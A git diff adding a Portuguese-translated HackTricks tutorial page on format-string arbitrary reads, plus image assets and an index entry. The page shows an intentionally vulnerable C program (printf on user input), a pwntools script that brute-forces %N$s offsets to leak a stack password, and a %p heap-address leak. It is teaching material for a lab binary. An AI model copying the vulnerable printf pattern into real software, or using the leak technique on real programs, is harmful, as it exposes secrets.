Translated ['binary-exploitation/format-strings/format-strings-arbitrary
BIN
.gitbook/assets/image (1225).png
Normal file
After Width: | Height: | Size: 140 KiB |
BIN
.gitbook/assets/image (1226).png
Normal file
After Width: | Height: | Size: 118 KiB |
BIN
.gitbook/assets/image (1227).png
Normal file
After Width: | Height: | Size: 112 KiB |
BIN
.gitbook/assets/image (1228).png
Normal file
After Width: | Height: | Size: 152 KiB |
BIN
.gitbook/assets/image (1229).png
Normal file
After Width: | Height: | Size: 157 KiB |
BIN
.gitbook/assets/image (1230).png
Normal file
After Width: | Height: | Size: 72 KiB |
BIN
.gitbook/assets/image (1231).png
Normal file
After Width: | Height: | Size: 118 KiB |
BIN
.gitbook/assets/image (1232).png
Normal file
After Width: | Height: | Size: 171 KiB |
BIN
.gitbook/assets/image (1233).png
Normal file
After Width: | Height: | Size: 41 KiB |
BIN
.gitbook/assets/image (1234).png
Normal file
After Width: | Height: | Size: 253 KiB |
|
@ -715,6 +715,7 @@
|
||||||
* [Array Indexing](binary-exploitation/array-indexing.md)
|
* [Array Indexing](binary-exploitation/array-indexing.md)
|
||||||
* [Integer Overflow](binary-exploitation/integer-overflow.md)
|
* [Integer Overflow](binary-exploitation/integer-overflow.md)
|
||||||
* [Format Strings](binary-exploitation/format-strings/README.md)
|
* [Format Strings](binary-exploitation/format-strings/README.md)
|
||||||
|
* [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
|
||||||
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
|
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
|
||||||
* [Heap](binary-exploitation/heap/README.md)
|
* [Heap](binary-exploitation/heap/README.md)
|
||||||
* [Use After Free](binary-exploitation/heap/use-after-free.md)
|
* [Use After Free](binary-exploitation/heap/use-after-free.md)
|
||||||
|
|
|
@ -0,0 +1,98 @@
|
||||||
|
# Exemplo de Leitura Arbitrária - Strings de Formato
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Outras maneiras de apoiar o HackTricks:
|
||||||
|
|
||||||
|
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Código
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
char stack_password[20] = "secretStackPass"; // Password in stack
|
||||||
|
char input1[20], input2[20];
|
||||||
|
|
||||||
|
printf("Enter first password: ");
|
||||||
|
scanf("%19s", input1);
|
||||||
|
|
||||||
|
printf("Enter second password: ");
|
||||||
|
scanf("%19s", input2);
|
||||||
|
|
||||||
|
// Vulnerable printf
|
||||||
|
printf(input1);
|
||||||
|
printf("\n");
|
||||||
|
|
||||||
|
// Check both passwords
|
||||||
|
if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
|
||||||
|
printf("Access Granted.\n");
|
||||||
|
} else {
|
||||||
|
printf("Access Denied.\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
Compile com:
|
||||||
|
```bash
|
||||||
|
clang -o fs-read fs-read.c -Wno-format-security
|
||||||
|
```
|
||||||
|
### Ler da pilha
|
||||||
|
|
||||||
|
A **`stack_password`** será armazenada na pilha porque é uma variável local, então apenas abusar do printf para mostrar o conteúdo da pilha é suficiente. Este é um exploit para BF as primeiras 100 posições para vazar as senhas da pilha:
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
for i in range(100):
|
||||||
|
print(f"Try: {i}")
|
||||||
|
payload = f"%{i}$s\na".encode()
|
||||||
|
p = process("./fs-read")
|
||||||
|
p.sendline(payload)
|
||||||
|
output = p.clean()
|
||||||
|
print(output)
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
Na imagem é possível ver que podemos vazar a senha da pilha na posição `10ª`:
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1231).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1230).png" alt="" width="338"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Executando o mesmo exploit, mas com `%p` em vez de `%s`, é possível vazar um endereço de heap da pilha em `%5$p`:
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1232).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1233).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1234).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
A diferença entre o endereço vazado e o endereço da senha é:
|
||||||
|
```
|
||||||
|
> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
|
||||||
|
$1 = 0x126a
|
||||||
|
```
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Outras maneiras de apoiar o HackTricks:
|
||||||
|
|
||||||
|
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||||||
|
|
||||||
|
</details>
|